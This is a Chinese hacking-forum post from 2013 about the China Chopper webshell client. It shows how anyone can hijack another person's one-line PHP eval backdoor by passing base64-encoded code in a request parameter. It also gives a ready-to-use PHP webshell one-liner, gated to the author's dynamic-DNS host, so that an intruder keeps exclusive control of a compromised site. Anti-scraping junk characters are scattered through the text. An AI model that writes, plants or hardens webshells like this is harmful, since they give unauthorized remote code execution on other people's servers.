找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2128|回复: 0
打印 上一主题 下一主题

中国菜刀 maicaidao 网站管理软件 0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:45:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞; }3 K9 b# ^* B, v
9 v8 w2 a# [/ Y; y) v' k
就算你设置了密码,使用了eval($_REQUEST['moyo']);; B4 P! s$ @% Q6 M7 K: o% r

4 Z) I" ~7 u# j但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门4 ^! v8 x* W; v4 z1 {. b  @) v0 n
+ ~0 U: j& @/ D- g- m% M
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
. b0 ?7 X' R3 }. C
$ ^/ i4 I( I. O+ X' ^/ {0 [直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了& {. r/ s! g5 {* |* I
, G0 _& l0 O4 S! H4 Z$ u1 X6 F
不知道是设计缺陷还是故意留的后门
; x0 W7 P/ k# K& C( k8 F3 H8 p7 _2 i8 z, O* t8 Y6 V
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
6 A. [2 b$ }( w. r& W
0 ?+ q0 s! ^0 b6 u! ~5 C  G0 I本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org( J" e7 Q* c4 m
- D& L8 U9 h6 b+ j  p
然后一句话后门这样写
  x: W' q) Q) ^( [; h5 V6 ~
" s4 k$ I6 Z0 q2 B# w. N- a<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>6 z; N7 ?+ W' u; j& d
这样就可以让一句话后门只允许自己的电脑连接了
, A: w, ~5 V9 j$ I
3 [& R. G" n5 b/ l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表